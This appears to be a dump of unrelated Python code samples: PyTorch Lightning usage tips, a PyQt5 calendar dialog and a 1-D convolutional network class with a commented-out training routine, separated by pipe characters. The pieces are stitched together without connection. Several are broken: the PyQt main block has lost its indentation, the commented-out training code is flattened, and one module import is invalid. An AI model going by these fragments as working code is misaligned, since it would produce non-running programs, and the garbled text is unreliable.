trainer = Trainer()
trainer.fit(model)
### NO .cuda() or .to() calls in PL #######################################
# DO NOT do this with PL
x = torch.Tensor(2, 3)
x = x.cuda()
x.to(device)
# INSTEAD DO THIS
x = x # leave it alone!
# or, to init a new tensor, do this ->
# BUG FIX: was ``torch.tensor(2, 3)`` (invalid — torch.tensor takes data,
# not sizes) and ``.as_type(x)`` (no such method; the API is Tensor.type_as).
new_x = torch.Tensor(2, 3)
new_x = new_x.type_as(x)
# NO SAMPLERS for distributed
# DON'T DO THIS
data = MNIST(...)
sampler = DistributedSampler(data)
DataLoader(data, sampler=sampler)
# DO THIS
data = MNIST(...)
DataLoader(data)
# A LightningModule is a torch.nn.Module with added functionality. Use it as such
model = FlashModel.load_from_checkpoint(PATH)
model.freeze()
out = model(x)
###########################################################################################
|
from PyQt5.QtWidgets import QDialog, QApplication, QVBoxLayout, QCalendarWidget, QLabel
import sys
from PyQt5 import QtGui
class Window(QDialog):
    """Dialog that shows a calendar; the currently selected date is echoed
    in a label underneath it."""

    def __init__(self):
        super().__init__()
        # Window-chrome settings consumed by init_window().
        self.title = "This is first thing"
        self.iconName = "plioky.ico"
        self.left = 200
        self.top = 100
        self.width = 1100
        self.height = 700
        # Widgets shared between calendar() and on_selection_changed().
        self.calendar_var = QCalendarWidget()
        self.label = QLabel()
        self.init_window()
        self.calendar()

    def init_window(self):
        """Apply icon, title and geometry, then display the dialog."""
        self.setWindowIcon(QtGui.QIcon(self.iconName))
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.show()

    def calendar(self):
        """Assemble the layout: grid-lined calendar above a styled label."""
        self.calendar_var.setGridVisible(True)
        self.calendar_var.selectionChanged.connect(self.on_selection_changed)
        self.label.setFont(QtGui.QFont("Sanserif", 15))
        self.label.setStyleSheet("color:blue")
        layout = QVBoxLayout()
        layout.addWidget(self.calendar_var)
        layout.addWidget(self.label)
        self.setLayout(layout)

    def on_selection_changed(self):
        """Reflect the newly selected date in the label."""
        self.label.setText(str(self.calendar_var.selectedDate()))
if __name__ == "__main__":
myapp = QApplication(sys.argv)
window = Window()
sys.exit(myapp.exec()) |
from torch.autograd import Variable
import torch
import torch.utils.data
import torch.tensor
import torch.nn as nn
import torch.nn.functional as nn_func
import torch.optim as optim
import numpy as np
import math
class ConvNet (nn.Module):
    # Fixed length every variable-length input sequence is resampled to.
    output_vector_size = 60
    def __init__(self,wordvector_size_input):
        """1-D CNN over word-vector sequences.

        Three same-padded Conv1d + BatchNorm + ReLU layers, then a per-word
        two-layer MLP producing one score per word, then a linear resampling
        of the variable-length score sequence to ``output_vector_size``.

        wordvector_size_input -- word-embedding dimensionality
        (becomes the Conv1d input channel count).
        """
        #hyperparameters
        input_channels = wordvector_size_input
        n_grams = 3 # must be odd number (keeps the (n_grams-1)//2 padding symmetric)
        self.hidden_channel_conv1 = 25
        self.hidden_channel_conv2 = 25
        self.hidden_channel_conv3 = 25
        self.hidden_layer_fc1 = 30
        self.number_of_classes = 1
        self.output_vector_size = ConvNet.output_vector_size
        #making hyperparameters more understandable in this function
        hidden_channel_conv1 = self.hidden_channel_conv1
        hidden_channel_conv2 = self.hidden_channel_conv2
        hidden_channel_conv3 = self.hidden_channel_conv3
        hidden_layer_fc1 = self.hidden_layer_fc1
        number_of_classes = self.number_of_classes
        # network structure
        super(ConvNet,self).__init__()
        self.conv1 = nn.Conv1d(input_channels,hidden_channel_conv1,n_grams,padding=((n_grams-1)//2 ))
        self.batch1 = nn.BatchNorm1d(hidden_channel_conv1)
        self.conv2 = nn.Conv1d(hidden_channel_conv1,hidden_channel_conv2,n_grams,padding=((n_grams-1)//2))
        self.batch2 = nn.BatchNorm1d(hidden_channel_conv2)
        self.conv3 = nn.Conv1d(hidden_channel_conv2,hidden_channel_conv3,n_grams,padding=((n_grams-1)//2))
        self.batch3 = nn.BatchNorm1d(hidden_channel_conv3)
        self.fc1 = nn.Linear(hidden_channel_conv3 , hidden_layer_fc1)
        self.fc2 = nn.Linear(hidden_layer_fc1, number_of_classes)
    def forward(self,flow):
        """Map a (batch, words, channels) batch to (batch, output_vector_size)."""
        #process through convolutional layers
        flow = flow.transpose(1,2) # nbatches * height * nchannels -> nbatches * nchannels * height
        mini_batch_size_here = flow.data.shape[0]
        number_of_words_here = flow.data.shape[2]
        flow = nn_func.relu(self.batch1(self.conv1(flow)))
        flow = nn_func.relu(self.batch2(self.conv2(flow)))
        flow = nn_func.relu(self.batch3(self.conv3(flow)))
        #reshape to [(minibatchsize * words) , -1] and process through fully connected layers
        flow = flow.transpose(1, 2).contiguous().view(-1, self.hidden_channel_conv3) # Does contiguous preserve graph relations between variables?
        flow = nn_func.relu(self.fc1(flow))
        flow = self.fc2(flow)
        # reshape to [minibatchsize , -1] and make it to [minibatchsize , output_vector_size]
        flow = flow.view(mini_batch_size_here,number_of_words_here)
        # Resample the per-word scores to a fixed length via a precomputed
        # linear map; the scaling below normalizes by the words-per-slot
        # ratio.  NOTE(review): this matrix is rebuilt on every forward call.
        variable_to_fixed_length_matrix = Variable(self.variable_to_fixed_length_matrix(number_of_words_here,self.output_vector_size))
        flow = torch.mm(flow ,variable_to_fixed_length_matrix)
        flow = flow * (self.output_vector_size/number_of_words_here)
        return flow
    def num_flat_features(self, x):
        # Product of all non-batch dimensions (stock PyTorch helper; not
        # called from forward() within this chunk).
        size = x.size()[1:] # all dimensions except the batch dimension
        num_features = 1
        for s in size:
            num_features *= s
        return num_features
    def variable_to_fixed_length_matrix(self,row,column):
        """Build a (row x column) float tensor redistributing ``row`` input
        positions over ``column`` output slots.

        First pass builds prefix-style columns: column i receives weight 1
        from every position below (i+1)*row/column, plus a fractional weight
        at the boundary position.  Second pass trims each row so a position
        contributes only to its own slot — splitting a fractional weight
        with the next slot — so each row's weights sum to 1.
        """
        output_np = np.zeros((row,column))
        for i in range(column):
            index = (i+1) * row/(column )
            index_floor = math.floor(index)
            for j in range(0,index_floor):
                output_np[j][i] = 1
            if (index != index_floor):
                output_np[index_floor][i] = index - index_floor
        for k in range(row):
            index = 0
            flag = True
            # Find the first column this row contributes to.
            for l in range(column):
                if ((output_np[k][l] > 0) and flag):
                    index = l
                    flag = False
            if(output_np[k][index] == 1) :
                # Whole weight belongs to this slot; clear the rest.
                for l in range(index+1,column):
                    output_np[k][l] = 0
            elif(output_np[k][index] < 1):
                # Split the remainder with the next slot; clear the rest.
                if(index+1 < column):
                    output_np[k][index+1] = 1- output_np[k][index]
                if(index+2 < column):
                    for l in range (index+2, column):
                        output_np[k][l] = 0
        return torch.from_numpy(output_np).float()
''' Useless for now
class cnn_model :
def __init__(self,wordvector_size_input):
self.net = ConvNet(wordvector_size_input) #wordvector size 100
self.word_vector_size =wordvector_size_input
def train_net(self,formattedReviewList_input):
self.criterion = nn.L1Loss() #ifnotdefined
learning_rate = 0.001
momentum_opt = 0.9
self.optimizer = optim.SGD(self.net.parameters(), lr=learning_rate, momentum=momentum_opt) #ifnotdefined
number_of_loops_over_dataset = 2
n_samples_per_mini_batch = 5
print_per_n_minibatches = 10
shuffle_training_dataset = False
wordvector_size = self.word_vector_size
max_words_for_string = self.max_words_for_string
#making dataset, mini-batch
for i, formattedReview in enumerate(formattedReviewList_input,0):
#zero padding
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if (formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],
:formattedReview.context.shape[1]] = formattedReview.context
# nSamples * nChannels * words form, make a tensor of it
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(), 0, 1), 0)
label = torch.FloatTensor([int(formattedReview.label)])
if(i != 0):
dataset_tensor = torch.cat((dataset_tensor,input), 0)
targetset_tensor = torch.cat((targetset_tensor,label),0)
else:
dataset_tensor = input
targetset_tensor = label
print(dataset_tensor.shape)
print(targetset_tensor.shape)
dataset = torch.utils.data.TensorDataset(dataset_tensor,targetset_tensor)
trainloader = torch.utils.data.DataLoader(dataset, batch_size = n_samples_per_mini_batch,shuffle = shuffle_training_dataset, num_workers = 1,drop_last= True)
for epoch in range(number_of_loops_over_dataset): # loop over the dataset multiple times
running_loss = 0.0
for i, train_data in enumerate(trainloader, 0):
# get the inputs
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if (formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],
:formattedReview.context.shape[1]] = formattedReview.context
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(), 0, 1), 0)
label = torch.FloatTensor([int(formattedReview.label)])
#get the inputs
input, label = train_data
# wrap them in Variable
inputs, labels = Variable(input), Variable(label)
# zero the parameter gradients
self.optimizer.zero_grad()
# forward + backward + optimize
outputs = self.net(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
# print statistics
running_loss += loss.data[0]
if i % print_per_n_minibatches == (print_per_n_minibatches-1): # print every n mini-batches
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / print_per_n_minibatches))
running_loss = 0.0
print('Finished Training')
def infer(self, minibatch_variable_input):
minibatch_size = 20
minibatch_tensor_list = self.mini_batch_from_formattedReview(minibatch_size,formattedReviewList_input)
output_list = []
for i, minibatch_tensor in enumerate(minibatch_tensor_list,0):
output = self.net(Variable(minibatch_tensor))
output_numpy_array = output.data.numpy().reshape((minibatch_size))
output_list.append(output_numpy_array)
print(output_list)
output = self.net(minibatch_variable_input)
#print(output)
return output
#return output_list
def mini_batch_from_formattedReview(self,mini_batch_size, formattedReviewList_input):
mini_batch_list = []
wordvector_size = self.word_vector_size
max_words_for_string = self.max_words_for_string
for i,formattedReview in enumerate(formattedReviewList_input,0):
#zero padding
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if(formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],:formattedReview.context.shape[1]] = formattedReview.context
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(),0,1),0)
label = torch.FloatTensor(int(formattedReview.label))
#making a minibatch list
if((i % mini_batch_size == mini_batch_size-1) or i >= len(formattedReviewList_input)):
minibatch_tensor = torch.cat((minibatch_tensor, input), 0)
mini_batch_list.append(minibatch_tensor)
elif (i %mini_batch_size != 0):
minibatch_tensor = torch.cat((minibatch_tensor, input), 0)
else:
minibatch_tensor = input
return mini_batch_list
def cnn (formattedReviewList_input, cnn_model_input) :
inference_cnn_numpy_array_list = cnn_model_input.infer(formattedReviewList_input)
return inference_cnn_numpy_array_list
def Create_cnn_model (variable_input):
wordvector_size_arg = variable_input.data.shape()[1]
return cnn_model(wordvector_size_arg)
cnn_1 = ConvNet(100)
number_of_words = 60
print(cnn_1.variable_to_fixed_length_matrix(number_of_words,cnn_1.output_vector_size))
cnn_1.forward(Variable(torch.rand(1,number_of_words,100)))
'''
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.